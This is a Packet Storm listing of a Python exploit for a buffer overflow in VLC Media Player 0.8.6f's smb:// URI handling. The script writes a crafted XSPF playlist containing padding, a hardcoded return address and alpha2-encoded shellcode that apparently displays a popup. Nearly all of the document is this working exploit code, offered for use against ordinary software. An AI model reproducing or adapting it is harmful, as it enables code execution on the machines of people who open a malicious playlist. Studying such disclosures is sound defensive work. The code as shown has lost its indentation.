VLC Media Player version 0.8.6f smb:// URI handling remote universal buffer overflow exploit.
d649fdc474ecfb008b12a47690f63248a097941ce54eae24de0fa9f8f47e64c1#!/usr/bin/python
#[*] Exploit : VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit (univ)
#[*] Credits : Pankaj Kohli
#[*] Exploit : His0k4
header1=(
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54"
"\x46\x2d\x38\x22\x3f\x3e\x0a\x3c\x70\x6c\x61\x79\x6c\x69\x73\x74"
"\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x22\x20\x78\x6d\x6c"
"\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x78\x73\x70\x66\x2e"
"\x6f\x72\x67\x2f\x6e\x73\x2f\x30\x2f\x22\x20\x78\x6d\x6c\x6e\x73"
"\x3a\x76\x6c\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77"
"\x2e\x76\x69\x64\x65\x6f\x6c\x61\x6e\x2e\x6f\x72\x67\x2f\x76\x6c"
"\x63\x2f\x70\x6c\x61\x79\x6c\x69\x73\x74\x2f\x6e\x73\x2f\x30\x2f"
"\x22\x3e\x0a\x09\x3c\x74\x69\x74\x6c\x65\x3e\x50\x6c\x61\x79\x6c"
"\x69\x73\x74\x3c\x2f\x74\x69\x74\x6c\x65\x3e\x0a\x09\x3c\x74\x72"
"\x61\x63\x6b\x4c\x69\x73\x74\x3e\x0a\x09\x09\x3c\x74\x72\x61\x63"
"\x6b\x3e\x0a\x09\x09\x09\x3c\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x3e"
"\x73\x6d\x62\x3a\x2f\x2f\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f"
"\x6d\x40\x77\x77\x77\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f"
"\x6d\x2f\x66\x6f\x6f\x2f\x23\x7b")
header2=(
"\x7d\x3c\x2f\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x3e\x0a\x09\x09\x09"
"\x3c\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x20\x61\x70\x70\x6c\x69"
"\x63\x61\x74\x69\x6f\x6e\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77"
"\x77\x77\x2e\x76\x69\x64\x65\x6f\x6c\x61\x6e\x2e\x6f\x72\x67\x2f"
"\x76\x6c\x63\x2f\x70\x6c\x61\x79\x6c\x69\x73\x74\x2f\x30\x22\x3e"
"\x0a\x09\x09\x09\x09\x3c\x76\x6c\x63\x3a\x69\x64\x3e\x30\x3c\x2f"
"\x76\x6c\x63\x3a\x69\x64\x3e\x0a\x09\x09\x09\x3c\x2f\x65\x78\x74"
"\x65\x6e\x73\x69\x6f\x6e\x3e\x0a\x09\x09\x3c\x2f\x74\x72\x61\x63"
"\x6b\x3e\x0a\x09\x3c\x2f\x74\x72\x61\x63\x6b\x4c\x69\x73\x74\x3e"
"\x0a\x3c\x2f\x70\x6c\x61\x79\x6c\x69\x73\x74\x3e\x0a\x0a")
#alpha2 encoded
popup_msg=(
"TY777777777777777777777777777777777QZjAXP0A0AkAAQ2AB2BB0"
"BBABXP8ABuJIXkweaHrJwpf02pQzePMhyzWwSuQnioXPOHuBxKnaQlkO"
"jpJHIvKOYokObPPwRN1uqt5PA")
payload = header1
payload += "\x41"*96
payload += "\x4A\x21\x51\x68" # push esp;retn printable
payload += popup_msg
payload += "\x41"*43
payload += header2
try:
out_file = open("exploit.xspf","w")
out_file.write(payload)
out_file.close()
print("\nExploit file created!\n")
except:
print "Error"
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed